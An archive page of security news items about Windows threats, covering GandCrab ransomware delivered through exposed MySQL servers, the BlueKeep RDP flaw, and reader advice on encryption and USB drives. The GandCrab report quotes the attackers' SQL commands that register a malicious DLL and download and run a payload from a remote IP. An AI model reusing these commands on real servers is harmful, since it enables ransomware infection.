Category Archives: Windows

Hackers target MySQL databases to deliver the GandCrab ransomware

Security experts at Sophos have detected a wave of attacks targeting Windows servers that are running MySQL databases with the intent of delivering the GandCrab ransomware

Sophos researchers have observed a wave of attacks targeting Windows servers that are running MySQL databases, threat actors aim at delivering the GandCrab ransomware.

This is the first time the company sees hackers targeting Windows servers running instances MySQL databases to infect them with ransomware.

The experts discovered the attacks because they hit one of the company’s honeypots that emulates MySQL listening on the default TCP port 3306.

The attackers attempt to connect to the database server and establish that it is running a MySQL instance.

Then, the attacker uses the “set” command to upload all the bytes composing the helper DLL into memory in a variable and wrote out the contents of that variable to a database table named yongger2.

The attacker concatenates the bytes into one file and drops them into the server’s plugin directory. The analysis of the DLL revealed it is used to add the xpdl3, xpdl3_deinit, and xpdl3_init functions to the database.

The attacker then drops the yongger2 table and the function xpdl3, if one already exists. At this point the attacker uses the following SQL command to create a database function (also named xpdl3) that is used to invoke the DLL:

CREATE FUNCTION xpdl3 RETURNS STRING SONAME 'cna12.dll'

The command to invoke the xpdl3 function is:

select xpdl3('hxxp://172.96.14.134:5471/3306-1[.]exe','c:\\isetup.exe') 

Using this attack scheme, the attacker instructs the database server to download the GandCrab payload from the remote machine and drops it in the root of the C: drive with the name isetup.exe and executes it.

According to Sophos, at least one Chinese threat actor is currently carrying out such kind of attacks, scanning the internet for Windows servers that are running MySQL databases.

“This particular attack transpired over just a few seconds at about midday, local time, on Sunday, May 19th.” reads the analysis published by Sophos.

“But the URL where the file originated bears some scrutiny. It pointed to an open directory on a web server running server software called HFS, which is a Windows-based web server in the form of a single application.”

“What makes this interesting is that the IP address of this machine hosting the GandCrab sample geolocates to Arizona, in the desert southwest region of the United States, and the user interface of the HFS installation on this machine is in simplified Chinese.”

The analysis of the server allowed the experts to determine the number of times the ransomware was downloaded.

The GandCrab sample that targeted the honeypot was downloaded more than 500 times. Unfortunately, the sample was not the only one, counted together, experts estimated that there have been nearly 800 downloads in the five days, as well as more than 2300 downloads of the other GandCrab sample in the open directory.

“The server appears to indicate more than 500 downloads of the sample I saw the MySQL honeypot download (3306-1.exe). However, the samples named 3306-2.exe, 3306-3.exe, and 3306-4.exe are identical to that file,” continues the analysis.

“Counted together, there has been nearly 800 downloads in the five days since they were placed on this server, as well as more than 2300 downloads of the other (about a week older) GandCrab sample in the open directory.

The researchers pointed out that this isn’t a massive or widespread attack, anyway it represents a serious risk to MySQL server admins that exposed their installs online.


If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – MySQL databases, GandCrab)

The post Hackers target MySQL databases to deliver the GandCrab ransomware appeared first on Security Affairs.

PoC Exploits for CVE-2019-0708 wormable Windows flaw released online

Several security experts have developed PoC exploits for wormable Windows RDS flaw tracked as CVE-2019-0708 and dubbed BlueKeep.

Experts have developed several proof-of-concept (PoC) exploits for the recently patched Windows Remote Desktop Services (RDS) vulnerability tracked as CVE-2019-0708 and dubbed BlueKeep.

One of the PoC exploits could be used for remote code execution on vulnerable systems.

Microsoft Patch Tuesday updates for May 2019 address nearly 80 vulnerabilities, including a Windows zero-day flaw and an RDS vulnerability that can be exploited to carry out WannaCry-like attack.

The issue is a remote code execution flaw in Remote Desktop Services (RDS) that it can be exploited by an unauthenticated attacker by connecting to the targeted system via the RDP and sending specially crafted requests.

As explained by Microsoft, this vulnerability could be exploited by malware with wormable capabilities, it could be exploited without user interaction, making it possible for malware to spread in an uncontrolled way into the target networks.

The vulnerability doesn’t affect Windows 8 and Windows 10, anyway previous versions are exposed to the risk of cyber attacks.

Microsoft also advised Windows Server users to block TCP port 3389 and enable Network Level Authentication to prevent any unauthenticated attacker from exploiting this vulnerability.

The issue poses a serious risk to organizations and industrial environments due to the presence of a large number of systems that could be reached via RDS.

Not all the exploits publicly released by the experts are fully working, come of them are able to trigger the vulnerability by don’t cause abny problem

Experts at the SANS Institute observed two partial exploits that are publicly available.

“Several security vendors stated publicly that they developed exploits internally that will at least trigger a denial of service condition (blue screen). Currently, there are at least two public partial exploits.” reads the blog post published by the SANS Institute, “One triggers the “vulnerable path” without triggering a blue screen or causing any other damage. It can be adjusted to play with the “channel” parameter to create normal and exploit traffic. The second one also triggers the vulnerability without any intended ill effect. The second exploit has been made available in the form of a stand-alone vulnerability scanner.”

Anyway, some researchers have created exploits to remotely execute code on vulnerable systems.

CVE-2019-0708 exploit code

Chaouki Bekrar, the founder of zero-day broker firm Zerodium, explained that the flaw can be exploited remotely by an unauthenticated user to gain access to a device with SYSTEM privileges.

Researchers at McAfee developed a PoC exploit that could be exploited to get remote code execution.

Experts believe that it just a matter of time before we will see threat actors exploiting the flaw in the wild.

“Right now, it is only a matter of time until someone publishes a working exploit or a malware author starts selling one on the underground markets. Should that happen, it will probably become very popular among less skilled cybercriminals and also a lucrative asset for its originator,” reads the post published by ESET.

BlueKeep will also show if organizations around the world learned a lesson after the large 2017 outbreaks and improved their security posture and patching routines.”


If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – hacking, CVE-2019-0708 )

The post PoC Exploits for CVE-2019-0708 wormable Windows flaw released online appeared first on Security Affairs.

If you haven’t yet patched the BlueKeep RDP vulnerability, do so now

There is still no public, working exploit code for CVE-2019-0708, a flaw that could allow an unauthenticated remote attacker to execute remote code on a vulnerable target running Remote Desktop Protocol (RDP). But, as many infosec experts have noted, we’re not far off from when one is created and leveraged by attackers in the wild. With the vulnerability being wormable, when it hits, the exploit could end up compromising millions of systems around the world, … More

The post If you haven’t yet patched the BlueKeep RDP vulnerability, do so now appeared first on Help Net Security.

Microsoft’s Attack Surface Analyzer now works on Macs and Linux, too

Microsoft has rewritten and open-sourced Attack Surface Analyzer (ASA), a security tool that points out potentially risky system changes introduced by the installation of new software or configuration changes. About Attack Surface Analyzer The initial version of the tool (v1.0, aka “classic”) was released in 2012 and worked only on Windows. It can be still downloaded, but is not supported any longer. This newest version (v.2.0) is built using .NET Core 2.1 and Electron, and … More

The post Microsoft’s Attack Surface Analyzer now works on Macs and Linux, too appeared first on Help Net Security.

Analysis of device data shines a light on cybersecurity risks in healthcare

The convergence of IT, IoT and OT makes it more difficult for the healthcare industry to manage a wide array of hard-to-control network security risks. IoT and OT devices are rapidly increasing in numbers, but traditional IT still represents the most vulnerable attack surface, according to the Forescout Technologies report. Forescout Technologies announced insights from 75 real healthcare deployments with more than 10,000 virtual local area networks (VLANs) and 1.5 million devices contained within the … More

The post Analysis of device data shines a light on cybersecurity risks in healthcare appeared first on Help Net Security.

Microsoft Warns WannaCry-like Windows Attack

Microsoft warns users of older versions of Windows of installing Windows Update immediately to protect against potential, widespread attacks. The software giant has fixed vulnerabilities in Remote Desktop Services running on Windows XP, Windows 7, and server versions such as Windows Server 2003, Windows Server 2008 R2, and Windows Server 2008. Microsoft is taking this unusual approach of releasing patches for Windows XP and Windows Server 2003, although both operating systems do not support it. Windows XP users must manually download updates from the Microsoft Update Catalog.

“This vulnerability is pre-authentication and requires no user interaction,” explains Simon Pope, director of incident response at Microsoft’s Security Response Center. “In other words, the vulnerability is ‘virus’, meaning that any future malware that exploits this vulnerability could propagate from the vulnerable computer to vulnerable computer in a similar way as the WannaCry malware spread across the globe in 2017.”

Microsoft said it had not observed the exploitation of this vulnerability. However, after the patch is released, it is only a matter of time before the attacker selects Microsoft patches and creates malware. Fortunately, Windows 8 and Windows 10 computers are not affected by this vulnerability. Although Windows 10 is now more popular than Windows 7, there are still millions of computers running Windows 7 that can make potential attacks very problematic.

Microsoft breaks the tradition of not patching, Windows operating systems that are not supported when thousands of computers in more than 100 countries are affected by the malware known as WannaCry. The malware uses a bug in the old version of Windows to encrypt the computer and asks for a $ 300 ransom before opening it. Microsoft is keen to avoid other WannaCry programs, even though it states that “the best way to resolve this vulnerability is to upgrade to the latest version of Windows.”

Source: https://www.theverge.com/2019/5/14/18623565/microsoft-windows-xp-remote-desktop-services-worm-security-patches

Related Resources:

Microsoft’s Windows 7, 8.1 To Have Defender Advanced Threat Protection

Windows-based Forensic Tools Available for Everyone

145 Windows-malware loaded Play Store Apps, deleted by Google

Latest Windows 10 Comes With Malware Protection

 

 

The post Microsoft Warns WannaCry-like Windows Attack appeared first on .

Microsoft plugs wormable RDP flaw, new speculative execution side channel vulnerabilities

For May 2019 Patch Tuesday, Microsoft has released fixes for 79 vulnerabilities, 22 of which are deemed critical. Among the fixes is that for CVE-2019-0708, a “wormable” RDP flaw that is expected to be weaponised by attackers very soon. About CVE-2019-0708 It’s a remote code execution vulnerability in Remote Desktop Services (formerly known as Terminal Services) that allows unauthenticated attackers to connect to the target system using RDP and send specially crafted requests. The flaw … More

The post Microsoft plugs wormable RDP flaw, new speculative execution side channel vulnerabilities appeared first on Help Net Security.

How do I buy a laptop with an encrypted hard drive?

Derek needs to find a laptop with Windows 10 Home’s device encryption to keep his data safe

I want to buy a new Windows 10 laptop for home use, and I want one with device encryption capability, so that the boot drive is encrypted. Until recently, this has only been possible with Windows Professional editions using BitLocker. I now see that if a laptop has the right specification, all versions of Windows 10 can have device encryption turned on.

The problem is that it’s difficult, if not impossible, to get information from mainstream laptop vendors as to whether a specific model supports device encryption. Recent MacBooks are capable of using FileVault and Apple spells out which models support it, so why is this information so hard to find for Windows laptops? Derek

I’m glad you asked because you’re right: there’s a shocking lack of information about device encryption on laptops, and this applies to Microsoft, to PC manufacturers, and to retailers. It’s also something that laptop PC reviewers rarely seem to mention, which makes it hard, if not impossible, to tell how many laptops are compatible with Windows 10’s device encryption.

Continue reading...

How do I stop old USB drives from infecting my new Windows PC?

Jason wants to protect his new high-end laptop from viruses but needs data on old SD cards

I’ve just bought a high-end Windows laptop for video editing while travelling around Europe. What steps can I take to prevent any possible infections from being passed on from previous machines on SD cards and external hard drives? Some of the external hard drives go back to machines from 2004 but I have never plugged any of them into any computers other than my own previous Macs and PCs. I work professionally with video, photography and coding, so all of this data is vital.

I have a five-machine Bitdefender licence but I’d be prepared to use another protection system, and I’ve looked at Sophos Intercept X. Jason

There are at least three things to think about. First, there’s the threat level: how at risk are you? Second, there’s provenance: how much do you know about your devices? Third, how can you mitigate any risks revealed by the answers to the first two questions?

Continue reading...